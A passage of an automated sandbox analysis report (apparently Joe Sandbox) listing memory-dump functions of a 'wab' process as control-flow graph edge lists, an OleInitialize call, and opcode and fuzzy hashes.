1708->1709 1709->1680 1715 28af9bae-28af9bb1 1709->1715 1710->1711 1716 28af9c3f-28af9c42 1711->1716 1717 28af9e30-28af9e39 1711->1717 1712->1698 1713->1717 1719 28af9bd4-28af9bd7 1715->1719 1720 28af9bb3-28af9bcf 1715->1720 1721 28af9c4c-28af9c4e 1716->1721 1722 28af9c44-28af9c49 1716->1722 1717->1695 1725 28af9e3f-28af9e49 1717->1725 1719->1682 1719->1704 1720->1719 1727 28af9c55-28af9c58 1721->1727 1728 28af9c50 1721->1728 1722->1721 1724->1707 1727->1668 1729 28af9c5e-28af9c91 call 28af33e8 1727->1729 1728->1727 1729->1713 1736 28af9c97-28af9cc9 call 28af57c8 1729->1736 1736->1713 1743 28af9ccf-28af9cf0 1736->1743 1746 28af9e16-28af9e27 call 28af57c8 1743->1746 1747 28af9cf6-28af9d52 1743->1747 1746->1713 1746->1743 1756 28af9d8c-28af9da8 1747->1756 1757 28af9d54-28af9d58 1747->1757 1756->1746 1761 28af9daa-28af9dc1 1756->1761 1757->1756 1759 28af9d5a-28af9d8a 1757->1759 1759->1756 1761->1746 1766 28af9dc3-28af9dc5 1761->1766 1766->1746 1768 28af9dc7-28af9e0f call 28af99e0 1766->1768 1768->1746
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (
                                                          • API String ID: 0-3887548279
                                                          • Opcode ID: 5c43fabbac58ab2afdc72e1d8a2d15a3385fe7b8f467b4d89d1e86615b67c192
                                                          • Instruction ID: 64427cb712efef92753970748f61d4f181d5a1ef3a8042a47e11861ddc5ccd9f
                                                          • Opcode Fuzzy Hash: 5c43fabbac58ab2afdc72e1d8a2d15a3385fe7b8f467b4d89d1e86615b67c192
                                                          • Instruction Fuzzy Hash: 09C13834A01204CBDB14DBA9D584B9DBBF2FB98311F288529E505EB391DF3ADD82CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AE35B0 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1778 28ae35b0-28ae361a OleInitialize 1779 28ae361c-28ae3622 1778->1779 1780 28ae3623-28ae3640 1778->1780 1779->1780
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 28AE360D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648138291.0000000028AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28ae0000_wab.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 90ff713845c9e6dbddf0c4b6485b95e64a3734514d91c89933953cbc79ffaa3f
                                                          • Instruction ID: 0c085d3c25c1ed1152419397b6354a7fa6f13a1ff3f07818505b544466a6c51c
                                                          • Opcode Fuzzy Hash: 90ff713845c9e6dbddf0c4b6485b95e64a3734514d91c89933953cbc79ffaa3f
                                                          • Instruction Fuzzy Hash: 2D1122B58042498FDB20DFAAD484BDEFFF4EB48310F24855AD459A7210D3B4A540CFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AE27A0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1783 28ae27a0-28ae361a OleInitialize 1785 28ae361c-28ae3622 1783->1785 1786 28ae3623-28ae3640 1783->1786 1785->1786
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 28AE360D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648138291.0000000028AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28ae0000_wab.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: f79a9366d75662df83b125b6d03fa5234e29777a5106138222c4d8152fc3df77
                                                          • Instruction ID: e882e03e07c84cfa70bd3d48d3173888c4eaa59d5fdf96f59498e58ff4c50c1d
                                                          • Opcode Fuzzy Hash: f79a9366d75662df83b125b6d03fa5234e29777a5106138222c4d8152fc3df77
                                                          • Instruction Fuzzy Hash: 361103B59046498FDB20DFAAD484B9EFBF4EB48210F24846AE519A7300D774A944CFA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFC188 Relevance: .9, Instructions: 934COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2240 2efc188-2efc1a3 2241 2efc1a5-2efc1a8 2240->2241 2242 2efc20c-2efc20f 2241->2242 2243 2efc1aa-2efc207 2241->2243 2244 2efc273-2efc276 2242->2244 2245 2efc211-2efc26e 2242->2245 2243->2242 2247 2efc2da-2efc2dd 2244->2247 2248 2efc278-2efc2d5 2244->2248 2245->2244 2250 2efc2df-2efc33c 2247->2250 2251 2efc341-2efc344 2247->2251 2248->2247 2250->2251 2252 2efc3a8-2efc3ab 2251->2252 2253 2efc346-2efc3a3 2251->2253 2256 2efc40f-2efc412 2252->2256 2257 2efc3ad-2efc40a 2252->2257 2253->2252 2263 2efc476-2efc479 2256->2263 2264 2efc414-2efc471 2256->2264 2257->2256 2267 2efc4dd-2efc4e0 2263->2267 2268 2efc47b-2efc4d8 2263->2268 2264->2263 2271 2efc53b-2efc53e 2267->2271 2272 2efc4e2-2efc536 2267->2272 2268->2267 2276 2efc590-2efc593 2271->2276 2277 2efc540-2efc58b 2271->2277 2272->2271 2286 2efc5e5-2efc5e8 2276->2286 2287 2efc595-2efc5e0 2276->2287 2277->2276 2292 2efc63a-2efc63d 2286->2292 2293 2efc5ea-2efc635 2286->2293 2287->2286 2297 2efc68f-2efc692 2292->2297 2298 2efc63f-2efc68a 2292->2298 2293->2292 2303 2efc6e4-2efc6e7 2297->2303 2304 2efc694-2efc6df 2297->2304 2298->2297 2314 2efc739-2efc73c 2303->2314 2315 2efc6e9-2efc734 2303->2315 2304->2303 2320 2efc78e-2efc791 2314->2320 2321 2efc73e-2efc789 2314->2321 2315->2314 2325 2efc7e3-2efc7e6 2320->2325 2326 2efc793-2efc7de 2320->2326 2321->2320 2331 2efc838-2efc83b 2325->2331 2332 2efc7e8-2efc833 2325->2332 2326->2325 2342 2efc88d-2efc890 2331->2342 2343 2efc83d-2efc888 2331->2343 2332->2331 2348 2efc8eb-2efc8ee 2342->2348 2349 2efc892-2efc8e6 2342->2349 2343->2342 2353 2efc952-2efc955 2348->2353 2354 2efc8f0-2efc94d 2348->2354 2349->2348 2359 2efc9bf-2efc9c2 2353->2359 2360 2efc957-2efc962 2353->2360 2354->2353 2370 2efca26-2efca29 2359->2370 2371 2efc9c4-2efca21 2359->2371 2374 2efc96c-2efc9ba 2360->2374 2377 2efca8d-2efca90 2370->2377 2378 2efca2b-2efca88 2370->2378 2371->2370 2374->2359 2383 2efcaf4-2efcaf7 2377->2383 2384 2efca92-2efcaef 2377->2384 2378->2377 2388 2efcaf9-2efcb50 2383->2388 2389 2efcb55-2efcb58 2383->2389 2384->2383 2388->2389 2398 2efcb5a-2efcbab 2389->2398 2399 2efcbb0-2efcbb3 2389->2399 2398->2399 2405 2efcc0b-2efcc0e 2399->2405 2406 2efcbb5-2efcc06 2399->2406 2411 2efcc66-2efcc69 2405->2411 2412 2efcc10-2efcc61 2405->2412 2406->2405 2417 2efcc6b-2efccbc 2411->2417 2418 2efccc1-2efccc4 2411->2418 2412->2411 2417->2418 2426 2efcd1c-2efcd1f 2418->2426 2427 2efccc6-2efcd17 2418->2427 2433 2efcd77-2efcd7a 2426->2433 2434 2efcd21-2efcd72 2426->2434 2427->2426 2438 2efcd7c-2efcdcd 2433->2438 2439 2efcdd2-2efcdd5 2433->2439 2434->2433 2438->2439 2447 2efce2d-2efce30 2439->2447 2448 2efcdd7-2efce28 2439->2448 2456 2efce88-2efce8b 2447->2456 2457 2efce32-2efce83 2447->2457 2448->2447 2459 2efce8d-2efcede 2456->2459 2460 2efcee3-2efcee6 2456->2460 2457->2456 2459->2460 2469 2efcf3e-2efcf41 2460->2469 2470 2efcee8-2efcf39 2460->2470 2473 2efcf99-2efcf9c 2469->2473 2474 2efcf43-2efcf94 2469->2474 2470->2469 2482 2efcf9e-2efcfef 2473->2482 2483 2efcff4-2efcff7 2473->2483 2474->2473 2482->2483 2491 2efd04f-2efd051 2483->2491 2492 2efcff9-2efd04a 2483->2492 2494 2efd058-2efd05b 2491->2494 2495 2efd053 2491->2495 2492->2491 2494->2241 2502 2efd061-2efd068 2494->2502 2495->2494
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3bcb7d73d17bbcf44deea50e27c394ef14ae770f979c228f0e73571d195e6353
                                                          • Instruction ID: 88982e977bb871d685bc3e7460ff5ba7d845f2df7d59100cc44b69fa3673b257
                                                          • Opcode Fuzzy Hash: 3bcb7d73d17bbcf44deea50e27c394ef14ae770f979c228f0e73571d195e6353
                                                          • Instruction Fuzzy Hash: C5822C74A012149FDB24DB28C590A6E77F3FF88701F9094AADA06A7390DF79AD81CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFEA00 Relevance: .8, Instructions: 800COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2526 2efea00-2efea1b 2527 2efea1d-2efea20 2526->2527 2528 2efea69-2efea6c 2527->2528 2529 2efea22-2efea64 2527->2529 2530 2efea6e-2efea70 2528->2530 2531 2efea7b-2efea7e 2528->2531 2529->2528 2532 2efeee9 2530->2532 2533 2efea76 2530->2533 2534 2efeac7-2efeaca 2531->2534 2535 2efea80-2efea8f 2531->2535 2537 2efeeec-2efeef8 2532->2537 2533->2531 2540 2efeacc-2efeb0e 2534->2540 2541 2efeb13-2efeb16 2534->2541 2538 2efea9e-2efeaaa 2535->2538 2539 2efea91-2efea96 2535->2539 2542 2efeefe-2eff1eb 2537->2542 2543 2efeca0-2efecaf 2537->2543 2544 2eff41d-2eff456 2538->2544 2545 2efeab0-2efeac2 call 2ef01a0 2538->2545 2539->2538 2540->2541 2546 2efeb5f-2efeb62 2541->2546 2547 2efeb18-2efeb5a 2541->2547 2740 2eff412-2eff41c 2542->2740 2741 2eff1f1-2eff1f7 2542->2741 2551 2efecbe-2efecca 2543->2551 2552 2efecb1-2efecb6 2543->2552 2564 2eff458-2eff45b 2544->2564 2545->2534 2549 2efeb85-2efeb88 2546->2549 2550 2efeb64-2efeb80 2546->2550 2547->2546 2557 2efeb8a-2efeb8c 2549->2557 2558 2efeb97-2efeb9a 2549->2558 2550->2549 2551->2544 2561 2efecd0-2efece2 call 2ef01a0 2551->2561 2552->2551 2566 2efeda7-2efedb0 2557->2566 2567 2efeb92 2557->2567 2569 2efeb9c-2efebde 2558->2569 2570 2efebe3-2efebe6 2558->2570 2590 2efece7-2efecea 2561->2590 2571 2eff47e-2eff481 2564->2571 2572 2eff45d-2eff479 2564->2572 2577 2efedbf-2efedcb 2566->2577 2578 2efedb2-2efedb7 2566->2578 2567->2558 2569->2570 2574 2efec2f-2efec32 2570->2574 2575 2efebe8-2efec2a 2570->2575 2588 2eff4b4-2eff4b7 2571->2588 2589 2eff483-2eff4af 2571->2589 2572->2571 2583 2efec7b-2efec7e 2574->2583 2584 2efec34-2efec76 2574->2584 2575->2574 2581 2efeedc-2efeee1 2577->2581 2582 2efedd1-2efede5 call 2ef0208 2577->2582 2578->2577 2581->2532 2582->2532 2614 2efedeb-2efedfd 2582->2614 2595 2efec9b-2efec9e 2583->2595 2596 2efec80-2efec96 2583->2596 2584->2583 2599 2eff4b9 2588->2599 2600 2eff4c6-2eff4c8 2588->2600 2589->2588 2591 2efecec-2efed2e 2590->2591 2592 2efed33-2efed36 2590->2592 2591->2592 2592->2537 2605 2efed3c-2efed3f 2592->2605 2595->2543 2595->2590 2596->2595 2620 2eff4bf-2eff4c1 2599->2620 2609 2eff4cf-2eff4d2 2600->2609 2610 2eff4ca 2600->2610 2615 2efed49-2efed4c 2605->2615 2616 2efed41-2efed46 2605->2616 2609->2564 2612 2eff4d4-2eff4e3 2609->2612 2610->2609 2636 2eff54a-2eff55f 2612->2636 2637 2eff4e5-2eff548 2612->2637 2638 2efedff-2efee05 2614->2638 2639 2efee21-2efee23 2614->2639 2623 2efed4e-2efed90 2615->2623 2624 2efed95-2efed97 2615->2624 2616->2615 2620->2600 2623->2624 2633 2efed9e-2efeda1 2624->2633 2634 2efed99 2624->2634 2633->2527 2633->2566 2634->2633 2659 2eff560 2636->2659 2637->2636 2645 2efee09-2efee15 2638->2645 2646 2efee07 2638->2646 2652 2efee2d-2efee39 2639->2652 2650 2efee17-2efee1f 2645->2650 2646->2650 2650->2652 2667 2efee3b-2efee45 2652->2667 2668 2efee47 2652->2668 2659->2659 2670 2efee4c-2efee4e 2667->2670 2668->2670 2670->2532 2673 2efee54-2efee70 2670->2673 2682 2efee7f-2efee8b 2673->2682 2683 2efee72-2efee77 2673->2683 2682->2581 2685 2efee8d-2efeeda 2682->2685 2683->2682 2685->2532 2742 2eff1f9-2eff1fe 2741->2742 2743 2eff206-2eff20f 2741->2743 2742->2743 2743->2544 2744 2eff215-2eff228 2743->2744 2746 2eff22e-2eff234 2744->2746 2747 2eff402-2eff40c 2744->2747 2748 2eff236-2eff23b 2746->2748 2749 2eff243-2eff24c 2746->2749 2747->2740 2747->2741 2748->2749 2749->2544 2750 2eff252-2eff273 2749->2750 2753 2eff275-2eff27a 2750->2753 2754 2eff282-2eff28b 2750->2754 2753->2754 2754->2544 2755 2eff291-2eff2ae 2754->2755 2755->2747 2758 2eff2b4-2eff2ba 2755->2758 2758->2544 2759 2eff2c0-2eff2d9 2758->2759 2761 2eff2df-2eff306 2759->2761 2762 2eff3f5-2eff3fc 2759->2762 2761->2544 2765 2eff30c-2eff316 2761->2765 2762->2747 2762->2758 2765->2544 2766 2eff31c-2eff333 2765->2766 2768 2eff335-2eff340 2766->2768 2769 2eff342-2eff35d 2766->2769 2768->2769 2769->2762 2774 2eff363-2eff37c 2769->2774 2777 2eff37e-2eff383 2774->2777 2778 2eff38b-2eff394 2774->2778 2777->2778 2778->2544 2779 2eff39a-2eff3ee 2778->2779 2779->2762
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1302cfac8cd502fbdaa45afe009f467475bf7cda66981d4195e408427cb22f0
                                                          • Instruction ID: c8a34803d2f80bf401d63b599931072b056b423266daa5c8df2046598e9170f9
                                                          • Opcode Fuzzy Hash: f1302cfac8cd502fbdaa45afe009f467475bf7cda66981d4195e408427cb22f0
                                                          • Instruction Fuzzy Hash: 47626B30A003098FDB15EB68D580A9EB7F2FF88305B64DA68D105AF365DB75ED46CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFB8C8 Relevance: .6, Instructions: 581COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2786 2efb8c8-2efb90f 2789 2efb911-2efb914 2786->2789 2790 2efb916-2efb93c 2789->2790 2791 2efb941-2efb944 2789->2791 2790->2791 2792 2efb946-2efb96c 2791->2792 2793 2efb971-2efb974 2791->2793 2792->2793 2794 2efb976-2efb99c 2793->2794 2795 2efb9a1-2efb9a4 2793->2795 2794->2795 2798 2efb9a6-2efb9cc 2795->2798 2799 2efb9d1-2efb9d4 2795->2799 2798->2799 2800 2efb9d6-2efb9fc 2799->2800 2801 2efba01-2efba04 2799->2801 2800->2801 2806 2efba06-2efba2c 2801->2806 2807 2efba31-2efba34 2801->2807 2806->2807 2808 2efba36-2efba5c 2807->2808 2809 2efba61-2efba64 2807->2809 2808->2809 2816 2efba7f-2efba82 2809->2816 2817 2efba66-2efba7a 2809->2817 2818 2efbaaf-2efbab2 2816->2818 2819 2efba84-2efbaaa 2816->2819 2817->2816 2826 2efbadf-2efbae2 2818->2826 2827 2efbab4-2efbada 2818->2827 2819->2818 2828 2efbb0f-2efbb12 2826->2828 2829 2efbae4-2efbb0a 2826->2829 2827->2826 2835 2efbb3f-2efbb42 2828->2835 2836 2efbb14-2efbb3a 2828->2836 2829->2828 2838 2efbb6f-2efbb72 2835->2838 2839 2efbb44-2efbb6a 2835->2839 2836->2835 2844 2efbb9f-2efbba2 2838->2844 2845 2efbb74-2efbb9a 2838->2845 2839->2838 2847 2efbbaf-2efbbb2 2844->2847 2848 2efbba4 call 2efc188 2844->2848 2845->2844 2854 2efbbdf-2efbbe2 2847->2854 2855 2efbbb4-2efbbda 2847->2855 2859 2efbbaa 2848->2859 2857 2efbc0f-2efbc12 2854->2857 2858 2efbbe4-2efbc0a 2854->2858 2855->2854 2864 2efbc3f-2efbc42 2857->2864 2865 2efbc14-2efbc3a 2857->2865 2858->2857 2859->2847 2867 2efbc44-2efbc46 2864->2867 2868 2efbc53-2efbc56 2864->2868 2865->2864 3002 2efbc48 call 2efd1f3 2867->3002 3003 2efbc48 call 2efd140 2867->3003 3004 2efbc48 call 2efd150 2867->3004 2872 2efbc58-2efbc7e 2868->2872 2873 2efbc83-2efbc86 2868->2873 2872->2873 2878 2efbc88-2efbcae 2873->2878 2879 2efbcb3-2efbcb6 2873->2879 2876 2efbc4e 2876->2868 2878->2879 2880 2efbcb8-2efbcde 2879->2880 2881 2efbce3-2efbce6 2879->2881 2880->2881 2886 2efbce8-2efbd0e 2881->2886 2887 2efbd13-2efbd16 2881->2887 2886->2887 2889 2efbd18-2efbd3e 2887->2889 2890 2efbd43-2efbd46 2887->2890 2889->2890 2895 2efbd48-2efbd6e 2890->2895 2896 2efbd73-2efbd76 2890->2896 2895->2896 2898 2efbd78-2efbd9e 2896->2898 2899 2efbda3-2efbda6 2896->2899 2898->2899 2905 2efbda8-2efbdce 2899->2905 2906 2efbdd3-2efbdd6 2899->2906 2905->2906 2908 2efbdd8-2efbdfe 2906->2908 2909 2efbe03-2efbe06 2906->2909 2908->2909 2915 2efbe08-2efbe2e 2909->2915 2916 2efbe33-2efbe36 2909->2916 2915->2916 2918 2efbe38-2efbe5e 2916->2918 2919 2efbe63-2efbe66 2916->2919 2918->2919 2925 2efbe68-2efbe8e 2919->2925 2926 2efbe93-2efbe96 2919->2926 2925->2926 2928 2efbe98-2efbebe 2926->2928 2929 2efbec3-2efbec6 2926->2929 2928->2929 2935 2efbec8-2efbeee 2929->2935 2936 2efbef3-2efbef6 2929->2936 2935->2936 2938 2efbef8-2efbf1e 2936->2938 2939 2efbf23-2efbf26 2936->2939 2938->2939 2945 2efbf28-2efbf4e 2939->2945 2946 2efbf53-2efbf56 2939->2946 2945->2946 2948 2efbf58-2efbf7e 2946->2948 2949 2efbf83-2efbf86 2946->2949 2948->2949 2955 2efbf88-2efbfae 2949->2955 2956 2efbfb3-2efbfb6 2949->2956 2955->2956 2958 2efbfb8-2efbfde 2956->2958 2959 2efbfe3-2efbfe6 2956->2959 2958->2959 2965 2efbfe8-2efbffe 2959->2965 2966 2efc003-2efc006 2959->2966 2965->2966 2968 2efc008-2efc02e 2966->2968 2969 2efc033-2efc036 2966->2969 2968->2969 2975 2efc038-2efc05e 2969->2975 2976 2efc063-2efc066 2969->2976 2975->2976 2978 2efc068-2efc08e 2976->2978 2979 2efc093-2efc096 2976->2979 2978->2979 2985 2efc098-2efc0be 2979->2985 2986 2efc0c3-2efc0c5 2979->2986 2985->2986 2988 2efc0cc-2efc0cf 2986->2988 2989 2efc0c7 2986->2989 2988->2789 2993 2efc0d5-2efc0db 2988->2993 2989->2988 3002->2876 3003->2876 3004->2876
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2627068240.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2ef0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a99627511175075dba52aa937726a46c40d971ec06e48a2551ee7eb707d87c2
                                                          • Instruction ID: ea89d8a659415dd790c6d6b9ae0bae248e359ad769544c9dd6f8fd36efa22c5a
                                                          • Opcode Fuzzy Hash: 2a99627511175075dba52aa937726a46c40d971ec06e48a2551ee7eb707d87c2
                                                          • Instruction Fuzzy Hash: 9022B3B07003059BDB259B38D48536D37A3FBCE318B609929E105EB355CF7ADD868B85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 28AFEEA0 Relevance: .5, Instructions: 467COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 3562 28afeea0-28afeec0 3563 28afeec2-28afeec5 3562->3563 3564 28afeee8-28afeeeb 3563->3564 3565 28afeec7-28afeee3 3563->3565 3566 28afeefd-28afef00 3564->3566 3567 28afeeed-28afeef6 3564->3567 3565->3564 3571 28afef27-28afef2a 3566->3571 3572 28afef02-28afef06 3566->3572 3569 28afef2c-28afef35 3567->3569 3570 28afeef8 3567->3570 3574 28afef3b-28afef42 3569->3574 3575 28aff243-28aff27e 3569->3575 3570->3566 3571->3569 3573 28afef47-28afef4a 3571->3573 3572->3575 3576 28afef0c-28afef1c 3572->3576 3577 28afef4c-28afef50 3573->3577 3578 28afef71-28afef74 3573->3578 3574->3573 3586 28aff280-28aff283 3575->3586 3583 28aff151-28aff154 3576->3583 3585 28afef22 3576->3585 3577->3575 3581 28afef56-28afef66 3577->3581 3582 28afef7a-28afef7d 3578->3582 3578->3583 3599 28aff18f-28aff193 3581->3599 3600 28afef6c 3581->3600 3588 28afef7f-28afef88 3582->3588 3589 28afef8d-28afef90 3582->3589 3587 28aff159-28aff15c 3583->3587 3585->3571 3590 28aff2a6-28aff2a9 3586->3590 3591 28aff285-28aff2a1 3586->3591 3593 28aff15e-28aff162 3587->3593 3594 28aff173-28aff176 3587->3594 3588->3589 3595 28afef92-28afef9b 3589->3595 3596 28afefa0-28afefa3 3589->3596 3601 28aff2af-28aff2d7 3590->3601 3602 28aff515-28aff517 3590->3602 3591->3590 3593->3575 3603 28aff168-28aff16e 3593->3603 3604 28aff18a-28aff18d 3594->3604 3605 28aff178-28aff17f 3594->3605 3595->3596 3597 28afefab-28afefae 3596->3597 3598 28afefa5-28afefa6 3596->3598 3608 28afefc1-28afefc4 3597->3608 3609 28afefb0-28afefb6 3597->3609 3598->3597 3599->3575 3607 28aff199-28aff1a9 3599->3607 3600->3578 3648 28aff2d9-28aff2dc 3601->3648 3649 28aff2e1-28aff325 3601->3649 3611 28aff51e-28aff521 3602->3611 3612 28aff519 3602->3612 3603->3594 3604->3599 3606 28aff1b4-28aff1b7 3604->3606 3605->3595 3613 28aff185 3605->3613 3618 28aff1ca-28aff1cd 3606->3618 3619 28aff1b9-28aff1c5 3606->3619 3607->3572 3630 28aff1af 3607->3630 3616 28afefdb-28afefde 3608->3616 3617 28afefc6-28afefca 3608->3617 3614 28afefbc 3609->3614 3615 28aff134-28aff13a 3609->3615 3611->3586 3620 28aff527-28aff530 3611->3620 3612->3611 3613->3604 3614->3608 3615->3575 3623 28aff140-28aff147 3615->3623 3625 28afeff5-28afeff8 3616->3625 3626 28afefe0-28afefe4 3616->3626 3617->3575 3624 28afefd0-28afefd6 3617->3624 3628 28aff1cf-28aff1d5 3618->3628 3629 28aff1da-28aff1dd 3618->3629 3619->3618 3631 28aff14c-28aff14f 3623->3631 3624->3616 3634 28afeffa-28aff00f 3625->3634 3635 28aff037-28aff03a 3625->3635 3626->3575 3633 28afefea-28afeff0 3626->3633 3628->3629 3636 28aff1ff-28aff202 3629->3636 3637 28aff1df-28aff1fa 3629->3637 3630->3606 3631->3583 3631->3587 3633->3625 3634->3575 3652 28aff015-28aff032 3634->3652 3635->3583 3639 28aff040-28aff043 3635->3639 3636->3609 3640 28aff208-28aff20b 3636->3640 3637->3636 3642 28aff04d-28aff050 3639->3642 3643 28aff045-28aff04a 3639->3643 3644 28aff21d-28aff220 3640->3644 3645 28aff20d 3640->3645 3642->3583 3650 28aff056-28aff059 3642->3650 3643->3642 3644->3567 3651 28aff226-28aff228 3644->3651 3654 28aff215-28aff218 3645->3654 3648->3620 3680 28aff32b-28aff334 3649->3680 3681 28aff50a-28aff514 3649->3681 3655 28aff05b-28aff070 3650->3655 3656 28aff097-28aff09a 3650->3656 3657 28aff22f-28aff232 3651->3657 3658 28aff22a 3651->3658 3652->3635 3654->3644 3655->3575 3668 28aff076-28aff092 3655->3668 3662 28aff0ef-28aff0f2 3656->3662 3663 28aff09c-28aff0ea call 28af99e0 3656->3663 3657->3563 3661 28aff238-28aff242 3657->3661 3658->3657 3665 28aff0f4-28aff0fd 3662->3665 3666 28aff102-28aff105 3662->3666 3663->3662 3665->3666 3669 28aff107-28aff10d 3666->3669 3670 28aff112-28aff115 3666->3670 3668->3656 3669->3670 3673 28aff11c-28aff11f 3670->3673 3674 28aff117-28aff119 3670->3674 3676 28aff12f-28aff132 3673->3676 3677 28aff121-28aff12a 3673->3677 3674->3673 3676->3615 3676->3631 3677->3676 3683 28aff33a-28aff3a6 call 28af99e0 3680->3683 3684 28aff500-28aff505 3680->3684 3696 28aff3ac-28aff3b1 3683->3696 3697 28aff4a0-28aff4b5 3683->3697 3684->3681 3699 28aff3cd 3696->3699 3700 28aff3b3-28aff3b9 3696->3700 3697->3684 3703 28aff3cf-28aff3d5 3699->3703 3701 28aff3bf-28aff3c1 3700->3701 3702 28aff3bb-28aff3bd 3700->3702 3704 28aff3cb 3701->3704 3702->3704 3705 28aff3ea-28aff3f7 3703->3705 3706 28aff3d7-28aff3dd 3703->3706 3704->3703 3712 28aff40f-28aff41c 3705->3712 3713 28aff3f9-28aff3ff 3705->3713 3707 28aff48b-28aff49a 3706->3707 3708 28aff3e3 3706->3708 3707->3696 3707->3697 3708->3705 3710 28aff41e-28aff42b 3708->3710 3711 28aff452-28aff45f 3708->3711 3722 28aff42d-28aff433 3710->3722 3723 28aff443-28aff450 3710->3723 3719 28aff477-28aff484 3711->3719 3720 28aff461-28aff467 3711->3720 3712->3707 3715 28aff403-28aff405 3713->3715 3716 28aff401 3713->3716 3715->3712 3716->3712 3719->3707 3724 28aff46b-28aff46d 3720->3724 3725 28aff469 3720->3725 3726 28aff437-28aff439 3722->3726 3727 28aff435 3722->3727 3723->3707 3724->3719 3725->3719 3726->3723 3727->3723
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2648155851.0000000028AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 28AF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_28af0000_wab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d4c16d40f084400ab1cf7276e71a087ec512da534b4f4ee5b2e970b3f87728ee
                                                          • Instruction ID: 48fb0a452408a197a39f6f6ba33a9502096bab8c7094bcd5a47bd66ff645ffe5
                                                          • Opcode Fuzzy Hash: d4c16d40f084400ab1cf7276e71a087ec512da534b4f4ee5b2e970b3f87728ee
                                                          • Instruction Fuzzy Hash: 61026B30A02209CFDB14CBA8D48079DB7B2FB59310F24857AE419EB652DF76DE81CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02EFE4C0 Relevance: .4, Instructions: 404COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
